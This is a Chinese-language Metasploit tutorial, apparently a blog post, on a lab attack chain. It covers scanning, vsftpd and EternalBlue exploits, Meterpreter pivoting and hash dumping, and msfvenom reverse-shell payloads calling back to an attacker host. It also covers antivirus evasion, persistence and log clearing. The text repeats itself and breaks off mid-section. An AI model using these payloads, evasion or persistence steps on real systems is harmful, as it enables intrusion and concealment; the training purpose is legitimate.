1. 项目概述从靶场到实战的渗透测试演练最近在带新人做渗透测试的实战演练发现很多朋友对Metasploit这个“瑞士军刀”的理解还停留在“输入命令一键getshell”的层面。这其实是一个很大的误区。Metasploit的强大在于它提供了一个从信息收集、漏洞利用到后渗透的完整框架而不仅仅是几个攻击模块。今天我就以一个典型的实战演练流程为例结合常见的靶场环境来拆解如何系统性地使用Metasploit进行漏洞利用。这个过程不仅仅是“打点”更是理解攻击链、评估风险以及思考防御策略的绝佳途径。无论你是安全运维人员、红队成员还是对安全攻防感兴趣的学习者掌握这套方法论都能让你在面对真实或模拟的漏洞时思路更清晰动作更精准。我们今天的核心路径会模拟一个经典的场景从外部探测开始发现一个存在已知漏洞的服务比如一个陈旧的Web应用框架利用Metasploit获取初始立足点然后进行简单的内网信息收集。你会发现很多在靶场如Pikachu、DVWA里手工验证的漏洞其利用思路与Metasploit中的模块化利用是相通的。我们将重点关注“为什么”要这么做而不仅仅是“怎么做”。例如为什么选择某个特定的Payload遇到防火墙或杀软怎么办利用成功后第一步该做什么这些实战中的细节才是区分脚本小子和专业选手的关键。2. 环境准备与前期信息收集2.1 靶场环境搭建与目标设定在真正对生产环境进行授权测试之前一个隔离的、合法的靶场环境是必不可少的。我个人的习惯是使用Docker快速搭建各类漏洞靶场这样既干净又便于重置。例如要搭建一个包含多种漏洞的Pikachu靶场只需执行一条命令docker pull area39/pikachu docker run -d -p 8080:80 area39/pikachu。目标IP就是你的Docker宿主机的IP端口是8080。除了Pikachu像DVWA、WebGoat、Metasploitable2/3等都是极好的学习环境。Metasploitable系列虚拟机本身就预置了大量精心设计的漏洞非常适合与Kali Linux或Parrot OS这类渗透测试系统配对使用。在本次演练中我们假设目标是一台IP为192.168.1.100的Metasploitable2主机。请务必确保你的攻击机如Kali Linux IP:192.168.1.10和目标机在同一网络段并能互相通信。注意所有操作必须在你自己拥有完全控制权的实验环境中进行。未经授权对任何非自有系统进行渗透测试是非法行为。前期信息收集是渗透测试的“眼睛”。在直接动用Metasploit之前我们需要尽可能多地了解目标。我会首先使用nmap进行端口扫描和服务识别nmap -sV -sC -O 192.168.1.100参数解释-sV探测服务版本-sC使用默认脚本进行更深入的探测-O尝试识别操作系统。扫描结果可能会显示目标开放了21FTP、22SSH、80HTTP、445SMB等端口并识别出具体的服务版本比如“vsftpd 2.3.4”、“Apache 2.2.8”、“Samba 3.x”。这些版本信息是后续搜索漏洞的关键输入。2.2 漏洞研究与利用模块筛选拿到服务版本信息后下一步就是判断是否存在已知的公开漏洞。我们可以利用searchsploit命令在本地漏洞库中查找或者访问在线漏洞库如Exploit-DB。例如搜索searchsploit vsftpd 2.3.4可能会发现著名的“vsftpd 2.3.4后门漏洞”。此时才是打开Metasploit控制台msfconsole的合适时机。在msfconsole中我们可以使用search命令来查找对应的利用模块。Metasploit的模块命名和组织非常有规律。例如针对上述vsftpd漏洞我们可以搜索search vsftpd 2.3.4通常会找到一个名为exploit/unix/ftp/vsftpd_234_backdoor的模块。这就是我们的“武器”。选择使用某个模块的命令是use [模块路径]例如use exploit/unix/ftp/vsftpd_234_backdoor。然而在真实的演练或授权测试中更常见的不是这种“一眼洞穿”的后门而是需要更多前置条件的漏洞。比如我们扫描发现目标运行着Drupal 7的一个旧版本。通过搜索我们知道存在Drupalgeddon系列远程代码执行漏洞。这时在Metasploit中搜索search drupal会列出多个相关模块。我们需要根据扫描到的确切版本号选择最匹配的那个。模块描述里通常会注明影响的版本范围这是选型的重要依据。3. Metasploit核心模块使用详解3.1 漏洞利用模块Exploit的配置与执行成功use一个漏洞利用模块后我们进入了该模块的上下文。首先需要使用show options查看需要配置的参数。通常有两大类RHOSTS 目标主机地址这是必须设置的。Payload 攻击载荷即成功利用漏洞后我们想在目标系统上执行的代码。这是Metasploit最精妙的部分之一。设置目标IPset RHOSTS 192.168.1.100。 设置Payload使用show payloads可以查看所有兼容的Payload。选择哪个Payload是门学问。一个通用的选择逻辑是连接类型 反向连接reverse还是正向连接bind在目标出网受限或我们有公网IP时常用反向连接即让目标主动连接我们。命令如set payload linux/x86/meterpreter/reverse_tcp。架构与平台 必须匹配目标系统。通过之前的nmap -O或服务旗标可以大致判断。Linux系统选linux/x86或linux/x64Windows系统选windows/x86或windows/x64。规避能力 如果担心目标有杀毒软件可以考虑编码或使用更隐蔽的Payload如meterpreter的https或find_port变种。设置监听IP和端口对于反向Payloadset LHOST 192.168.1.10你的攻击机IPset LPORT 4444。所有参数设置完毕后可以输入run或exploit发起攻击。如果漏洞利用成功我们将获得一个会话session通常是Meterpreter shell。实操心得在运行exploit之前强烈建议先使用check命令。部分模块支持此命令用于检测目标是否存在该漏洞而不实际发起攻击。这在不被允许造成业务中断的渗透测试中非常有用可以避免“误伤”。3.2 Meterpreter后渗透基础操作获得一个Meterpreter会话是渗透测试的一个关键里程碑。它提供了一个功能强大的、动态可扩展的远程控制接口。以下是一些最常用、最基础的后渗透命令也是获取进一步信息的关键系统信息sysinfo查看目标机器和操作系统详情。权限提升getuid查看当前权限。如果权限不足如www-data需要尝试提权。可以运行getsystemWindows或使用post/multi/recon/local_exploit_suggester模块自动建议可能的本地提权漏洞。文件系统操作pwd/lpwd: 查看目标/本地当前目录。ls/cd: 列出、切换目录。upload /path/to/local/file C:\\target\\path 上传文件到Windows目标。download C:\\interesting\\file.txt /tmp/ 从目标下载文件。进程操作ps列出进程。如果需要将Meterpreter会话迁移到一个更稳定的进程如explorer.exe可以使用migrate [PID]命令避免因为当前进程如脆弱的web服务进程退出而导致会话丢失。网络探测ipconfig/ifconfig查看目标网络接口。arp查看ARP缓存。route查看路由表。这些信息对于判断目标在内网中的位置、发现其他网段至关重要。信息收集run post/multi/gather/hashdump尝试抓取Windows系统的密码哈希需要SYSTEM权限。run post/linux/gather/hashdump针对Linux系统。这些操作的目的不仅仅是控制更是为了收集下一步行动所需的情报例如内网拓扑、凭据信息等。4. 结合手工测试与自动化工具的综合利用4.1 从SQL注入手工测试到Metasploit利用在很多Web应用渗透中我们首先发现的是SQL注入点。就像在Pikachu靶场中练习的那样我们通过手工测试加单引号‘、and 11、and 12确认注入点甚至通过union select爆出数据库名、表名和字段。这个过程锻炼的是我们对漏洞原理的理解。但是手工注入效率低且对于复杂的注入如盲注非常耗时。此时我们会转向sqlmap这样的自动化工具。sqlmap -u “http://target.com/vul.php?id1” --dbs可以快速枚举数据库。然而sqlmap的最终目的往往是获取数据而作为渗透测试者我们有时更希望获得一个shell。这就是Metasploit可以衔接的地方。Metasploit提供了auxiliary/admin/http/tomcat_ghostcat等模块但更常见的是当我们通过sqlmap的--os-shell参数获得了一个有限的命令行例如通过MySQL的into outfile写Webshell时我们可以利用这个初始立足点上传一个由Metasploit生成的可执行Payload然后切换到Metasploit进行监听和连接。例如在获得一个简单的Webshell或命令执行点后我们可以用Metasploit生成一个木马msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST192.168.1.10 LPORT5555 -f elf -o shell.elf然后通过Webshell的上传功能将shell.elf传到目标服务器赋予执行权限chmod x shell.elf并运行它。同时在Metasploit中启动对应的监听器use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set LHOST 192.168.1.10; set LPORT 5555; exploit就能得到一个功能完整的Meterpreter会话。这个过程完美体现了手工测试、自动化工具和渗透框架的有机结合。4.2 针对特定漏洞的利用链构建有些漏洞的利用需要多个步骤或者Metasploit没有直接的“一键利用”模块。这时就需要我们根据漏洞原理手动构建利用链。以“Shiro反序列化漏洞”为例。这是一个非常经典的Java Web框架漏洞。虽然网络上有许多一键化的利用工具如shiro-exploit、shiro_attack但理解其本质很重要。漏洞核心在于Shiro使用了固定的AES加密密钥对Cookie进行序列化/反序列化处理攻击者可以构造恶意的序列化数据加密后替换Cookie中的rememberMe字段达到远程代码执行的目的。在Metasploit中虽然没有一个名为exploit/java/shiro的模块但我们可以利用其强大的Payload生成和监听功能来配合利用。典型步骤是使用ysoserial等工具生成一个包含Metasploit Payload的恶意序列化对象例如CommonsCollections2链。使用已知的Shiro默认密钥如kPHbIxk5D2deZiIxcaaaA对这个序列化对象进行AES加密和Base64编码。将结果作为rememberMeCookie的值发送给目标网站。在Metasploit中启动一个exploit/multi/handler监听器配置与Payload对应的参数。一旦目标服务器反序列化了我们的恶意数据就会执行Payload反向连接到我们的监听器从而获得Shell。这个过程要求测试者不仅会使用工具更要理解反序列化、加密、编码等基础知识。5. 内网穿透与横向移动初步5.1 利用MSF会话进行内网探测当我们拿下一台边界服务器通常称为“跳板机”或“立足点”后真正的挑战往往刚刚开始内网横向移动。假设我们通过攻击外网Drupal服务器获得了内网一台主机192.168.1.100的Meterpreter会话通过ipconfig发现它还有另一张网卡IP是10.10.10.2。这意味着它处于一个双网卡位置连接着另一个内部网络10.10.10.0/24。我们首先需要将这个Meterpreter会话背景化以便在MSF中执行其他操作。在Meterpreter中按CtrlZ或者输入background命令会话会转到后台运行。接下来我们可以添加一条路由告诉Metasploit所有发往10.10.10.0/24网段的流量都通过我们刚获得的这个会话假设是session 1来转发。命令是route add 10.10.10.0 255.255.255.0 1添加成功后我们就可以在MSF中直接使用任何辅助扫描模块或漏洞利用模块去攻击10.10.10.0/24这个内网中的其他主机了就像它们直接暴露在我们面前一样。例如我们可以使用auxiliary/scanner/smb/smb_version模块来扫描内网中开放的445端口寻找可能存在“永恒之蓝”MS17-010漏洞的Windows主机。5.2 针对内网服务的漏洞利用假设通过内网扫描我们发现主机10.10.10.50开放了445端口且SMB版本号显示可能未打MS17-010补丁。这时我们就可以在MSF中直接使用“永恒之蓝”漏洞利用模块use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 10.10.10.50 set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.10 # 注意这里的LHOST仍然是攻击机的外网IP set LPORT 4445 exploit这里有一个关键点LHOST和LPORT是Payload回连的地址和端口。由于我们的攻击机在外网192.168.1.10而新目标10.10.10.50在内网它无法直接访问到我们的攻击机。因此我们需要借助之前已经攻陷的跳板机10.10.10.2做端口转发。一种方法是使用Meterpreter的portfwd命令在跳板机上建立一个转发通道。例如在session 1中执行portfwd add -L 192.168.1.10 -l 4445 -p 4445 -r 10.10.10.50这条命令有些复杂解释一下它告诉跳板机将所有发往它自身10.10.10.24445端口的流量转发到内网目标10.10.10.50的4445端口。但这样配置我们的攻击机MSF监听器需要监听跳板机的IP。更常见的做法是使用MSF的reverse_tcppayload配合路由Payload会尝试回连LHOST:LPORT这个连接请求会被跳板机发出经过网络路由最终需要能到达攻击机。在简单的NAT环境下只要跳板机可以访问攻击机的IP即可成功。在复杂网络下可能需要搭建socks代理。常见问题内网横向移动时Payload无法回连。排查思路1. 检查路由是否添加正确route print。2. 检查跳板机到攻击机的网络连通性在跳板机Meterpreter中用shell命令执行ping 攻击机IP。3. 考虑使用bind_tcp正向Payload让攻击机主动连接内网目标需要能访问到目标IP。4. 使用MSF的socks_proxy模块搭建代理让其他扫描工具如Nmap也能通过代理扫描内网。6. 免杀处理与持久化驻留6.1 Payload的编码与免杀规避在实战中直接将Metasploit生成的原始Payload可执行文件上传到目标很可能被终端杀毒软件AV或端点检测与响应EDR软件瞬间查杀。因此对Payload进行简单的免杀处理是必要的。msfvenom本身提供了一些基础的编码器例如x86/shikata_ga_nai。可以进行多次编码msfvenom -p windows/x64/meterpreter/reverse_https LHOSTyour-vps-ip LPORT443 -e x86/shikata_ga_nai -i 10 -f exe -o payload_encoded.exe参数-i 10表示编码10次。然而必须清醒认识到这种基于编码的免杀在当今的AV面前效果已经非常有限尤其是针对静态特征检测。它更多是用于规避一些简单的特征扫描。更有效的方法包括分离加载器Loader与Shellcode 使用msfvenom生成纯Shellcode-f raw然后自己用C/C/Go/Python等语言编写一个加载器将Shellcode解密后在内存中执行。这样可以完全规避基于文件特征的查杀。使用Veil、Shellter等免杀框架 这些工具采用了更先进的混淆、加密和注入技术。利用合法软件白名单 将Shellcode注入到rundll32.exe、msbuild.exe、regsvr32.exe等系统可信进程的内存中执行。Metasploit的exploit/windows/local/xxx模块很多都采用这种思路。使用HTTPS等加密协议Payload 如reverse_https其网络流量特征比明文的reverse_tcp更隐蔽。实操心得没有一劳永逸的免杀方法。最好的策略是“低慢小”降低攻击频率使用常见的协议端口如443保持Payload小巧。并且要准备多个备用的Payload和加载方式。6.2 持久化后门与权限维持获取访问权限后如何防止管理员重启服务或机器后就丢失权限这就需要持久化Persistence。Metasploit的Meterpreter提供了非常方便的持久化脚本但痕迹也相对明显。在Meterpreter会话中可以运行run persistence -X -i 30 -p 443 -r your-vps-ip参数解释-X表示系统启动时自启动-i 30表示每30秒尝试回连一次-p和-r指定回连的端口和IP。这个脚本会在目标机器上创建一个注册表项或计划任务并落地一个后门文件。然而在防守严密的系统中这种自动化脚本创建的项目很容易被安全软件或管理员发现。更隐蔽的手工持久化方法包括计划任务 创建名称伪装成系统服务的计划任务在特定时间或事件触发时执行Payload。服务创建 安装一个新的Windows服务指向一个伪装的可执行文件。启动文件夹 将快捷方式放入当前用户或所有用户的启动文件夹。注册表键 修改HKLM\Software\Microsoft\Windows\CurrentVersion\Run等注册表键值。WMI事件订阅 这是一种非常隐蔽的持久化方式通过WMI过滤器在特定系统事件如用户登录、特定进程启动时触发执行Payload。在Meterpreter中可以使用incognito模块或mimikatz扩展来窃取令牌或转储密码哈希通过传递哈希Pass-the-Hash的方式获取其他系统的权限这也是一种间接的权限维持方式因为获得了更高权限的凭据。7. 痕迹清理与报告撰写要点7.1 渗透测试后的日志与痕迹清理在授权的渗透测试中清理痕迹通常不是必须步骤有时甚至被要求保留攻击证据。但在某些演练场景下为了模拟高级持续性威胁APT的隐蔽性或者出于对靶机环境的保护需要进行基本的清理。在Meterpreter中可以使用timestomp命令修改文件的时间戳将其恢复为与其他系统文件相似的时间。对于Windows系统需要关注以下日志但请注意直接删除日志文件行为本身会留下更明显的安全日志记录安全日志 记录登录/注销、特权使用等。可通过clearev命令尝试清除Meterpreter会话相关的安全日志、应用程序日志和系统日志但这并非总是100%有效。Web日志 如果通过Web漏洞进入需清理目标Web服务器如Apache的access.logerror.log中的攻击请求记录。命令行历史 在Linux中清理.bash_history在Windows中可以通过meterpreter的shell进入后使用命令doskey /reinstall来清除当前会话的命令记录治标不治本。更高级的清理涉及直接操作日志文件或通过注入进程内存来清除单条日志记录这需要更深入的系统知识。务必注意在非授权环境中清理痕迹是违法行为的重要证据。在授权测试中是否清理、清理到何种程度必须事先与客户明确约定。7.2 从利用到报告思维转换一次完整的渗透测试漏洞利用只是中间环节。真正的价值产出是渗透测试报告。报告需要将技术语言转化为业务语言和管理语言。一份专业的报告至少应包含执行摘要 用非技术语言向管理层概述测试范围、发现的主要风险、整体安全状况评级以及最紧迫的建议。测试范围与方法 明确测试的IP、域名、系统类型和所用的主要方法黑盒/白盒/灰盒。详细发现 这是报告的核心。每个漏洞应作为一个独立条目包含漏洞标题 简明扼要如“Drupal Core 远程代码执行漏洞CVE-2018-7600”。风险等级 通常分为高危、中危、低危、信息级需结合CVSS评分和业务影响综合评定。受影响资产 具体的URL或IP地址。漏洞描述 用通俗语言说明漏洞是什么。漏洞验证步骤 提供详细的、可复现的操作步骤和截图。这就是我们使用Metasploit和手工测试的过程记录。例如“使用Metasploit的exploit/unix/webapp/drupal_drupalgeddon2模块设置RHOST为目标URL成功获取了www-data用户的Meterpreter会话。”漏洞原理 简要的技术原理分析帮助开发人员理解根源。修复建议 具体、可操作的修复方案。例如“立即将Drupal核心升级至7.58及以上版本。”、“对用户输入的所有参数进行严格的过滤和转义。”参考链接 CVE编号、官方补丁链接、相关技术文章。附录 可以放置一些工具输出截图、流量包片段等辅助材料。从炫技的“拿下权限”到严谨的“输出报告”是渗透测试人员从技术专家向安全顾问转型的关键一步。报告的质量直接决定了测试的价值也是衡量你专业水平的重要标尺。养成在测试过程中随时截图、记录命令和结果的习惯会为后续的报告撰写节省大量时间。
Metasploit实战:从漏洞利用到内网渗透的完整攻防演练
发布时间:2026/6/20 11:07:21
1. 项目概述从靶场到实战的渗透测试演练最近在带新人做渗透测试的实战演练发现很多朋友对Metasploit这个“瑞士军刀”的理解还停留在“输入命令一键getshell”的层面。这其实是一个很大的误区。Metasploit的强大在于它提供了一个从信息收集、漏洞利用到后渗透的完整框架而不仅仅是几个攻击模块。今天我就以一个典型的实战演练流程为例结合常见的靶场环境来拆解如何系统性地使用Metasploit进行漏洞利用。这个过程不仅仅是“打点”更是理解攻击链、评估风险以及思考防御策略的绝佳途径。无论你是安全运维人员、红队成员还是对安全攻防感兴趣的学习者掌握这套方法论都能让你在面对真实或模拟的漏洞时思路更清晰动作更精准。我们今天的核心路径会模拟一个经典的场景从外部探测开始发现一个存在已知漏洞的服务比如一个陈旧的Web应用框架利用Metasploit获取初始立足点然后进行简单的内网信息收集。你会发现很多在靶场如Pikachu、DVWA里手工验证的漏洞其利用思路与Metasploit中的模块化利用是相通的。我们将重点关注“为什么”要这么做而不仅仅是“怎么做”。例如为什么选择某个特定的Payload遇到防火墙或杀软怎么办利用成功后第一步该做什么这些实战中的细节才是区分脚本小子和专业选手的关键。2. 环境准备与前期信息收集2.1 靶场环境搭建与目标设定在真正对生产环境进行授权测试之前一个隔离的、合法的靶场环境是必不可少的。我个人的习惯是使用Docker快速搭建各类漏洞靶场这样既干净又便于重置。例如要搭建一个包含多种漏洞的Pikachu靶场只需执行一条命令docker pull area39/pikachu docker run -d -p 8080:80 area39/pikachu。目标IP就是你的Docker宿主机的IP端口是8080。除了Pikachu像DVWA、WebGoat、Metasploitable2/3等都是极好的学习环境。Metasploitable系列虚拟机本身就预置了大量精心设计的漏洞非常适合与Kali Linux或Parrot OS这类渗透测试系统配对使用。在本次演练中我们假设目标是一台IP为192.168.1.100的Metasploitable2主机。请务必确保你的攻击机如Kali Linux IP:192.168.1.10和目标机在同一网络段并能互相通信。注意所有操作必须在你自己拥有完全控制权的实验环境中进行。未经授权对任何非自有系统进行渗透测试是非法行为。前期信息收集是渗透测试的“眼睛”。在直接动用Metasploit之前我们需要尽可能多地了解目标。我会首先使用nmap进行端口扫描和服务识别nmap -sV -sC -O 192.168.1.100参数解释-sV探测服务版本-sC使用默认脚本进行更深入的探测-O尝试识别操作系统。扫描结果可能会显示目标开放了21FTP、22SSH、80HTTP、445SMB等端口并识别出具体的服务版本比如“vsftpd 2.3.4”、“Apache 2.2.8”、“Samba 3.x”。这些版本信息是后续搜索漏洞的关键输入。2.2 漏洞研究与利用模块筛选拿到服务版本信息后下一步就是判断是否存在已知的公开漏洞。我们可以利用searchsploit命令在本地漏洞库中查找或者访问在线漏洞库如Exploit-DB。例如搜索searchsploit vsftpd 2.3.4可能会发现著名的“vsftpd 2.3.4后门漏洞”。此时才是打开Metasploit控制台msfconsole的合适时机。在msfconsole中我们可以使用search命令来查找对应的利用模块。Metasploit的模块命名和组织非常有规律。例如针对上述vsftpd漏洞我们可以搜索search vsftpd 2.3.4通常会找到一个名为exploit/unix/ftp/vsftpd_234_backdoor的模块。这就是我们的“武器”。选择使用某个模块的命令是use [模块路径]例如use exploit/unix/ftp/vsftpd_234_backdoor。然而在真实的演练或授权测试中更常见的不是这种“一眼洞穿”的后门而是需要更多前置条件的漏洞。比如我们扫描发现目标运行着Drupal 7的一个旧版本。通过搜索我们知道存在Drupalgeddon系列远程代码执行漏洞。这时在Metasploit中搜索search drupal会列出多个相关模块。我们需要根据扫描到的确切版本号选择最匹配的那个。模块描述里通常会注明影响的版本范围这是选型的重要依据。3. Metasploit核心模块使用详解3.1 漏洞利用模块Exploit的配置与执行成功use一个漏洞利用模块后我们进入了该模块的上下文。首先需要使用show options查看需要配置的参数。通常有两大类RHOSTS 目标主机地址这是必须设置的。Payload 攻击载荷即成功利用漏洞后我们想在目标系统上执行的代码。这是Metasploit最精妙的部分之一。设置目标IPset RHOSTS 192.168.1.100。 设置Payload使用show payloads可以查看所有兼容的Payload。选择哪个Payload是门学问。一个通用的选择逻辑是连接类型 反向连接reverse还是正向连接bind在目标出网受限或我们有公网IP时常用反向连接即让目标主动连接我们。命令如set payload linux/x86/meterpreter/reverse_tcp。架构与平台 必须匹配目标系统。通过之前的nmap -O或服务旗标可以大致判断。Linux系统选linux/x86或linux/x64Windows系统选windows/x86或windows/x64。规避能力 如果担心目标有杀毒软件可以考虑编码或使用更隐蔽的Payload如meterpreter的https或find_port变种。设置监听IP和端口对于反向Payloadset LHOST 192.168.1.10你的攻击机IPset LPORT 4444。所有参数设置完毕后可以输入run或exploit发起攻击。如果漏洞利用成功我们将获得一个会话session通常是Meterpreter shell。实操心得在运行exploit之前强烈建议先使用check命令。部分模块支持此命令用于检测目标是否存在该漏洞而不实际发起攻击。这在不被允许造成业务中断的渗透测试中非常有用可以避免“误伤”。3.2 Meterpreter后渗透基础操作获得一个Meterpreter会话是渗透测试的一个关键里程碑。它提供了一个功能强大的、动态可扩展的远程控制接口。以下是一些最常用、最基础的后渗透命令也是获取进一步信息的关键系统信息sysinfo查看目标机器和操作系统详情。权限提升getuid查看当前权限。如果权限不足如www-data需要尝试提权。可以运行getsystemWindows或使用post/multi/recon/local_exploit_suggester模块自动建议可能的本地提权漏洞。文件系统操作pwd/lpwd: 查看目标/本地当前目录。ls/cd: 列出、切换目录。upload /path/to/local/file C:\\target\\path 上传文件到Windows目标。download C:\\interesting\\file.txt /tmp/ 从目标下载文件。进程操作ps列出进程。如果需要将Meterpreter会话迁移到一个更稳定的进程如explorer.exe可以使用migrate [PID]命令避免因为当前进程如脆弱的web服务进程退出而导致会话丢失。网络探测ipconfig/ifconfig查看目标网络接口。arp查看ARP缓存。route查看路由表。这些信息对于判断目标在内网中的位置、发现其他网段至关重要。信息收集run post/multi/gather/hashdump尝试抓取Windows系统的密码哈希需要SYSTEM权限。run post/linux/gather/hashdump针对Linux系统。这些操作的目的不仅仅是控制更是为了收集下一步行动所需的情报例如内网拓扑、凭据信息等。4. 结合手工测试与自动化工具的综合利用4.1 从SQL注入手工测试到Metasploit利用在很多Web应用渗透中我们首先发现的是SQL注入点。就像在Pikachu靶场中练习的那样我们通过手工测试加单引号‘、and 11、and 12确认注入点甚至通过union select爆出数据库名、表名和字段。这个过程锻炼的是我们对漏洞原理的理解。但是手工注入效率低且对于复杂的注入如盲注非常耗时。此时我们会转向sqlmap这样的自动化工具。sqlmap -u “http://target.com/vul.php?id1” --dbs可以快速枚举数据库。然而sqlmap的最终目的往往是获取数据而作为渗透测试者我们有时更希望获得一个shell。这就是Metasploit可以衔接的地方。Metasploit提供了auxiliary/admin/http/tomcat_ghostcat等模块但更常见的是当我们通过sqlmap的--os-shell参数获得了一个有限的命令行例如通过MySQL的into outfile写Webshell时我们可以利用这个初始立足点上传一个由Metasploit生成的可执行Payload然后切换到Metasploit进行监听和连接。例如在获得一个简单的Webshell或命令执行点后我们可以用Metasploit生成一个木马msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST192.168.1.10 LPORT5555 -f elf -o shell.elf然后通过Webshell的上传功能将shell.elf传到目标服务器赋予执行权限chmod x shell.elf并运行它。同时在Metasploit中启动对应的监听器use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set LHOST 192.168.1.10; set LPORT 5555; exploit就能得到一个功能完整的Meterpreter会话。这个过程完美体现了手工测试、自动化工具和渗透框架的有机结合。4.2 针对特定漏洞的利用链构建有些漏洞的利用需要多个步骤或者Metasploit没有直接的“一键利用”模块。这时就需要我们根据漏洞原理手动构建利用链。以“Shiro反序列化漏洞”为例。这是一个非常经典的Java Web框架漏洞。虽然网络上有许多一键化的利用工具如shiro-exploit、shiro_attack但理解其本质很重要。漏洞核心在于Shiro使用了固定的AES加密密钥对Cookie进行序列化/反序列化处理攻击者可以构造恶意的序列化数据加密后替换Cookie中的rememberMe字段达到远程代码执行的目的。在Metasploit中虽然没有一个名为exploit/java/shiro的模块但我们可以利用其强大的Payload生成和监听功能来配合利用。典型步骤是使用ysoserial等工具生成一个包含Metasploit Payload的恶意序列化对象例如CommonsCollections2链。使用已知的Shiro默认密钥如kPHbIxk5D2deZiIxcaaaA对这个序列化对象进行AES加密和Base64编码。将结果作为rememberMeCookie的值发送给目标网站。在Metasploit中启动一个exploit/multi/handler监听器配置与Payload对应的参数。一旦目标服务器反序列化了我们的恶意数据就会执行Payload反向连接到我们的监听器从而获得Shell。这个过程要求测试者不仅会使用工具更要理解反序列化、加密、编码等基础知识。5. 内网穿透与横向移动初步5.1 利用MSF会话进行内网探测当我们拿下一台边界服务器通常称为“跳板机”或“立足点”后真正的挑战往往刚刚开始内网横向移动。假设我们通过攻击外网Drupal服务器获得了内网一台主机192.168.1.100的Meterpreter会话通过ipconfig发现它还有另一张网卡IP是10.10.10.2。这意味着它处于一个双网卡位置连接着另一个内部网络10.10.10.0/24。我们首先需要将这个Meterpreter会话背景化以便在MSF中执行其他操作。在Meterpreter中按CtrlZ或者输入background命令会话会转到后台运行。接下来我们可以添加一条路由告诉Metasploit所有发往10.10.10.0/24网段的流量都通过我们刚获得的这个会话假设是session 1来转发。命令是route add 10.10.10.0 255.255.255.0 1添加成功后我们就可以在MSF中直接使用任何辅助扫描模块或漏洞利用模块去攻击10.10.10.0/24这个内网中的其他主机了就像它们直接暴露在我们面前一样。例如我们可以使用auxiliary/scanner/smb/smb_version模块来扫描内网中开放的445端口寻找可能存在“永恒之蓝”MS17-010漏洞的Windows主机。5.2 针对内网服务的漏洞利用假设通过内网扫描我们发现主机10.10.10.50开放了445端口且SMB版本号显示可能未打MS17-010补丁。这时我们就可以在MSF中直接使用“永恒之蓝”漏洞利用模块use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 10.10.10.50 set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.10 # 注意这里的LHOST仍然是攻击机的外网IP set LPORT 4445 exploit这里有一个关键点LHOST和LPORT是Payload回连的地址和端口。由于我们的攻击机在外网192.168.1.10而新目标10.10.10.50在内网它无法直接访问到我们的攻击机。因此我们需要借助之前已经攻陷的跳板机10.10.10.2做端口转发。一种方法是使用Meterpreter的portfwd命令在跳板机上建立一个转发通道。例如在session 1中执行portfwd add -L 192.168.1.10 -l 4445 -p 4445 -r 10.10.10.50这条命令有些复杂解释一下它告诉跳板机将所有发往它自身10.10.10.24445端口的流量转发到内网目标10.10.10.50的4445端口。但这样配置我们的攻击机MSF监听器需要监听跳板机的IP。更常见的做法是使用MSF的reverse_tcppayload配合路由Payload会尝试回连LHOST:LPORT这个连接请求会被跳板机发出经过网络路由最终需要能到达攻击机。在简单的NAT环境下只要跳板机可以访问攻击机的IP即可成功。在复杂网络下可能需要搭建socks代理。常见问题内网横向移动时Payload无法回连。排查思路1. 检查路由是否添加正确route print。2. 检查跳板机到攻击机的网络连通性在跳板机Meterpreter中用shell命令执行ping 攻击机IP。3. 考虑使用bind_tcp正向Payload让攻击机主动连接内网目标需要能访问到目标IP。4. 使用MSF的socks_proxy模块搭建代理让其他扫描工具如Nmap也能通过代理扫描内网。6. 免杀处理与持久化驻留6.1 Payload的编码与免杀规避在实战中直接将Metasploit生成的原始Payload可执行文件上传到目标很可能被终端杀毒软件AV或端点检测与响应EDR软件瞬间查杀。因此对Payload进行简单的免杀处理是必要的。msfvenom本身提供了一些基础的编码器例如x86/shikata_ga_nai。可以进行多次编码msfvenom -p windows/x64/meterpreter/reverse_https LHOSTyour-vps-ip LPORT443 -e x86/shikata_ga_nai -i 10 -f exe -o payload_encoded.exe参数-i 10表示编码10次。然而必须清醒认识到这种基于编码的免杀在当今的AV面前效果已经非常有限尤其是针对静态特征检测。它更多是用于规避一些简单的特征扫描。更有效的方法包括分离加载器Loader与Shellcode 使用msfvenom生成纯Shellcode-f raw然后自己用C/C/Go/Python等语言编写一个加载器将Shellcode解密后在内存中执行。这样可以完全规避基于文件特征的查杀。使用Veil、Shellter等免杀框架 这些工具采用了更先进的混淆、加密和注入技术。利用合法软件白名单 将Shellcode注入到rundll32.exe、msbuild.exe、regsvr32.exe等系统可信进程的内存中执行。Metasploit的exploit/windows/local/xxx模块很多都采用这种思路。使用HTTPS等加密协议Payload 如reverse_https其网络流量特征比明文的reverse_tcp更隐蔽。实操心得没有一劳永逸的免杀方法。最好的策略是“低慢小”降低攻击频率使用常见的协议端口如443保持Payload小巧。并且要准备多个备用的Payload和加载方式。6.2 持久化后门与权限维持获取访问权限后如何防止管理员重启服务或机器后就丢失权限这就需要持久化Persistence。Metasploit的Meterpreter提供了非常方便的持久化脚本但痕迹也相对明显。在Meterpreter会话中可以运行run persistence -X -i 30 -p 443 -r your-vps-ip参数解释-X表示系统启动时自启动-i 30表示每30秒尝试回连一次-p和-r指定回连的端口和IP。这个脚本会在目标机器上创建一个注册表项或计划任务并落地一个后门文件。然而在防守严密的系统中这种自动化脚本创建的项目很容易被安全软件或管理员发现。更隐蔽的手工持久化方法包括计划任务 创建名称伪装成系统服务的计划任务在特定时间或事件触发时执行Payload。服务创建 安装一个新的Windows服务指向一个伪装的可执行文件。启动文件夹 将快捷方式放入当前用户或所有用户的启动文件夹。注册表键 修改HKLM\Software\Microsoft\Windows\CurrentVersion\Run等注册表键值。WMI事件订阅 这是一种非常隐蔽的持久化方式通过WMI过滤器在特定系统事件如用户登录、特定进程启动时触发执行Payload。在Meterpreter中可以使用incognito模块或mimikatz扩展来窃取令牌或转储密码哈希通过传递哈希Pass-the-Hash的方式获取其他系统的权限这也是一种间接的权限维持方式因为获得了更高权限的凭据。7. 痕迹清理与报告撰写要点7.1 